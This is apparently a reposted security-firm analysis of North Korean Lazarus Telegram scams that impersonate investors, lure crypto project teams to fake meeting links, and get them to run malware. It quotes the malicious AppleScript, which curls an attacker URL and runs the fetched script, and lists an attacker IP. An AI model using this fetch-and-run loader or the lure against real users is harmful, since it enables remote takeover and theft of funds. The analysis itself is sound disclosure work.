朝鲜黑客 Telegram 定点欺诈攻击分析_每日快讯(专注热点分享网)

朝鲜黑客 Telegram 定点欺诈攻击分析


朝鲜黑客 Telegram 定点欺诈攻击分析

  2023-12-07 23:15:08     简体|繁體
http://news.qghjm.com/1014009.html

背景

早在 2022 年,慢雾安全团队就通过慢雾 BTI 情报网络发现朝鲜黑客 Lazarus 团伙开启针对加密货币行业的大规模 Telegram 欺诈钓鱼行动,近期朝鲜黑客更是开始冒充知名投资机构,对项目方进行欺诈钓鱼,鉴于影响范围较大,慢雾在此进行分析。

技战法

一、挑选知名投资机构作为冒充对象,然后建立虚假的 Telegram 帐号:

二、寻找知名的 DeFi 项目方作为目标,以要投资他们为名,使用虚假帐号开始实施骗局:

朝鲜黑客会先对目标发起聊天以建立联系,如果项目方看到消息且安全意识不足,就会出现下图的一幕:

朝鲜黑客骗取项目方的信任后便开始约会议,此处有两种攻击手法:

1. 邀请项目方加入如 ***.group-meeting.team 之类的会议,假装询问对方是否有时间安排会面或详谈,并主动提供恶意会议链接。项目方点击链接后会看到地区访问限制,这时朝鲜黑客会接着诱使项目方下载并运行其提供的“修改定位”的恶意脚本。一旦项目方照做,那么他的电脑就会被朝鲜黑客控制,导致资金被盗取。下面是恶意脚本 IP_Request.scpt 的内容:

set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"

set sc to do shell script "curl -L -k""& fix_url &"/""

run script sc

代码解释:

2. 利用 Calendly 会议预定系统的“添加自定义链接”在事件页面的功能,在事件上插入恶意链接发起钓鱼攻击。由于 Calendly 与大多数项目方的日常工作背景很好地融合在一起,因此这些恶意链接不容易引起怀疑,项目方容易无意中点击恶意链接,下载并执行恶意代码,此时朝鲜黑客同样可以获取到项目方系统相关信息或权限。

慢雾安全团队在 2023 年 11 月 30 日 也对相关攻击手法做过提醒:

基础 IOC:

IP: 104.168.137.21

Domains:

恶意攻击样例:

总结

鉴于此类诈骗行为仍在持续发生,建议 Web3 用户务必确保在添加好友时通过双重渠道确认对方的真实性,同时对 Telegram 开启双重身份验证(2FA),随时注意交易安全,以免遭受资金损失。

一旦不慎运行相关木马,请第一时间转移相关资金、断网杀毒,同时修改目标电脑上(包括浏览器里记录的)相关账号密码等信息。



编辑:web3528btc 来源:加密钱包代币

免责声明:以上文章内容信息均搜集自互联网或用户发布,并不代表本站观点或立场,本站不对其真实合法性负责。如有信息侵犯了您的权益,请联系本站将立即删除。
分享到:

  • 上一篇
    下一篇

  • 今日要闻|实事关注

    每日快讯(专注热点分享网)
    手机查看(二维码扫一扫)

    每日快讯网,最有影响力热点信息分类网站,覆盖品牌价值、汽车资讯、视频、基金、财经、房产、金融新闻、券商、公司等多类信息分享交流,免费提供最有价值的头条信息平台。
    « 2021年 » « 05月 »
    12
    3456789
    10111213141516
    17181920212223
    24252627282930
    31

    最新资讯

    [开户代运营]oppo信息流代理商,小护士血压计,熊胆粉,量大,成本低,需要来联系
  • 2025-06-04 06:43:35

     

    [开户代运营]AI剪辑课/短视频带货/短视频变现,腾讯开户,加白,代运营,视频号投放,起量贼快。
  • 2025-06-04 06:39:32

     

    [开户代运营] 债务纠纷法律咨询 直投企V添加 成本20左右 日产千条 目前法律咨询公司资质可开户
  • 2025-06-04 06:35:28

     

    [开户代运营]口腔牙科种植CPA意向表单,帮助医院门店机构精准拓客引流,产出比高,出量稳定!!
  • 2025-06-04 06:31:25

     

    [开户代运营]app拉新唤醒ocpc监测回传 API开发对接联调
  • 2025-06-04 06:27:21

     

    人保安心保一年期重疾险(免健告版)投保规则有哪些?保障哪些内容?
  • 2025-06-04 06:23:18

     

    1 0 6 短信获客
  • 2025-06-04 06:19:14

     

    [代运营托管]有短剧、语聊、电商、直播、游戏等线上场景应用资源的渠道可深度交流合作。
  • 2025-06-04 06:15:10

     

    [代运营托管]乌鲁木齐天山国际机场航站楼广告位
  • 2025-06-04 06:11:07

     

    [开户代运营]:抖音法律代运营,专业运营推广,服务无数的法律客户!寻有需求甲方!
  • 2025-06-04 06:07:03

     

    [开户代运营]抖音/腾讯院校招生的资源,开户代运营投流!日耗30万+,专业运营推广!
  • 2025-06-04 06:03:00

     

    [开户代运营]:寻工具APP,休闲小游戏APP等量大的甲方,专业运营推广服务你们
  • 2025-06-04 05:58:56

     

    [开户代运营]抖音专本科/职研/同等学力/留学开户推广,抖音一级代理,专业运营推广!
  • 2025-06-04 05:54:52

     

    [开户代运营]抖音夏令营/冬令营特训的量,日耗10万+!专业代运营推广,一上线就有量!
  • 2025-06-04 05:50:49

     

    [开户代运营]百度(baidu)痔疮,眼病,皮肤,带状疱疹后遗,哮喘,肺病等小病种推广,量大稳定 需要的老板联系
  • 2025-06-04 05:46:45